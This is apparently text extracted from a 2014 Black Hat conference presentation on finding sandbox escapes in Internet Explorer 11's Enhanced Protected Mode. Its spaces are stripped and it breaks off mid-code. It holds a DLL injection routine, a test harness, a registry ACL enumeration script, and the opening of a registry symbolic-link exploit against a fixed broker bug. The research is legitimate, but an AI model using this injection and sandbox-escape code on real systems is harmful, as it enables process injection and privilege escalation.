搜索
7/1/2014DiggingforSandboxEscapesFindingsandboxbreakoutsinInternetExplorerJamesForshaw@tiraniddoBlackhatUSA2014WhatI’mGoingtoTalkAbout•UnderstandingtheIE11sandbox•Howtofindsandboxescapes•Wheretolookforissues•TechnicaldetailsoffixedbugsI’vefoundToolsandSetupResources•ExamplecodeandExploitDotNetDCOMavailable:–•LatestversionofOleViewDotNet:–•ExcellentwriteupofEPMbyMarkVincentYason–BlackhatASIA2014ArchivesBackgroundonIE11SandboxingIEProtectedModeFrameProcessUserPermissionInternetTabProcessIntranetZoneProcessInternetTabProcessInternetZoneProcessLowPermissionNetworkIPCBoundaryUserBrokerLowPermissionProcesses•ProtectedModeusesIntegrityLevels•InternetZoneProcessrunswithLowILinToken–Restrictswriteaccesstomajoritysecurableresources–RestrictsWin32throughUserInterfacePrivilegedIsolation–DoesNOTrestrictreadaccesstomostresources•Processes/Threadsalsohaveno-read-upbydefaultWhatDoesitMean,Enhanced?•EnhancedProtectedMode(EPM)newinWindows8•UsesWindows8AppContainer’stofurtherrestrictwhatsandboxedprocesscandoAppContainerResourceAccess•Restrictsreadandwriteaccesstoresources•DACLmustgiveaccesstooneormoreof:–AppContainerSID–S-1-15-3-4096–SIDforInternetExplorerCapability–ALLAPPLICATIONPACKAGESgroupSID•LowILstillappliesaswelltorestrictwritesFurtherCapabilitiesUserBrokerServices•Mediumintegritybrokerprovidesvariousservicesonbehalfofprotectedmodeprocess–Providesaccesstoresourcesfromlowintegrity•Certainfunctionshookedandredirectedtobrokerautomatically–CreateProcessWandWinExec–CoCreateInstanceandCoCreateInstanceEx–CoGetClassObject•UsesregistrybasedelevationpolicytocontrolwhatisallowedElevationPolicyElevationPolicyTypesExecutableCOMObjectElevationPolicyTypesValueResult3ProtectedModesilentlylaunchesthebrokerasamediumintegrityprocess.2ProtectedModepromptstheuserforpermissiontolaunchtheprocess.Ifpermissionisgranted,theprocessislaunchedasamediumintegrityprocess.1ProtectedModesilentlylaunchesthebrokerasalowintegrityprocess.0ProtectedModepreventstheprocessfromlaunching.COM101•MajorityofBrokerServicesexposedoverCOM•ObjectsidentifiedbyaClassID(CLSID)GUID•ImplementedbyaServer,eitheraDLLoranExecutable•AnobjectcanhavemultipleInterfacesidentifiedbyInterfaceID(IID)•AllobjectssupporttheIUnknowninterface.–ImplementsQueryInterfacemethod,allowscallertoquerybetweenobjects•Abstractprogrammingmodel,canbeusedlocallyorremotely(DistributedCOM/DCOM).PotentialAttackSurfaceFrameProcessUserPermissionInternetZoneProcessLowPermissionIPCBoundaryUserBrokerAccessibleResourcesAllowedThroughElevationPolicyIEProcessStructure•IEXPLORE.EXEdoesn’tdoverymuch,justhandsofftoieframe!IEWinMain•Ieframe.dllalsocontainsmostofthebrokerimplementation•Supportlibrariesierutil.dllandieproxy.dllalsoofimportanceEnablingEPM•WasdefaultonRTM8.1•DisabledagaininMS13-088•Alsosupports64bittabprocesses•DefaultifusingModernModeTestingSandboxEscapes•Wanttotestsandboxescapes?•NoRCE?Noproblem.•UseasimpleDLLinjectorvoid*pBuf=VirtualAllocEx(hProc,0,strlen(dllpath)+1,MEM_COMMIT,PAGE_READWRITE);WriteProcessMemory(hProc,pBuf,dllpath,strlen(dllpath)+1)LPVOIDpLL=GetProcAddress(GetModuleHandle(Lkernel32),LoadLibraryA);CreateRemoteThread(hProc,NULL,0,pLL,pBuf,0,NULL)SetAppropriatePermissions•CreateadirectoryforDLLs•Add“ALLAPPLICATIONPACKAGES”ACEtodirectoryDACL•FileswillinheritACESimpleDLLTestHarnessDWORDCALLBACKExploitThread(LPVOIDhModule){//DoWorkthenexitandfreelibraryFreeLibraryAndExitThread((HMODULE)hModule,0);}BOOLAPIENTRYDllMain(HMODULEhModule,DWORDul_reason_for_call,LPVOIDlpReserved){switch(ul_reason_for_call){caseDLL_PROCESS_ATTACH:CreateThread(NULL,0,ExploitThread,hModule,0,NULL);break;default:break;}returnTRUE;}FindingandExploitingAccessibleResourcesSearchingforAccessibleResourcesSet-Location'HKCU:\'$iesid=S-1-15-3-4096$aapsid=APPLICATIONPACKAGEAUTHORITY\ALLAPPLICATIONPACKAGESForEach($keyin(Get-ChildItem-recurse)){$acl=Get-Acl-path$key.PSPathForEach($acein$acl.Access){If($ace.RegistryRights-eq[Security.AccessControl.RegistryRights]::FullControl-and$ace.IdentityReference.Value-in$iesid,$aapsid){Write-Output$key.PSPath}}}ProcessMonitorfortheWin!•IdentifiedkeysalwayscreatedbymediumintegrityIEprocessatstart-upProcessMonitorfortheWin!•IdentifiedkeysalwayscreatedbymediumintegrityIEprocessatstart-up•IESetProtectedModeRegKeyOnlylooksinterestingIESetProtectedModeRegKeyOnlyIESetProtectedModeRegKeyOnly•Createskeyifitdoesn’texist•IfnotaccessiblefromAppContainer–Addlowintegritylabel–AddIECapabilitySIDtoDACLStartDoesKeyExist?CreateKeyIsKeyAccessible?NOYESMakeAccessibleNOEndYESSoWhat?•CaninducemediumintegrityIEtocreatekeys•AnykeywecreatewillhaveACLallowingEPMprocessfullaccess•Butsurelywecan’tcreateanyinterestingkeys?•Wellobviouslywecan!RegistrySymbolicLinksFindingaTargetKeyExploitation:Step1•Createasymboliclinkfromaccessibleregistryareatotarget:SymbolicLinkNtCreateKey(&hKey,KEY_ALL_ACCESS,&oa,0,NULL,REG_OPTION_CREATE_LINK,&disposition);RltInitUnicodeString(&valuename,LSymbolicLinkValue);NtSetValueKey(hKey,&valuename,0,REG_LINK,dst,wcslen(dst)*sizeof(WCH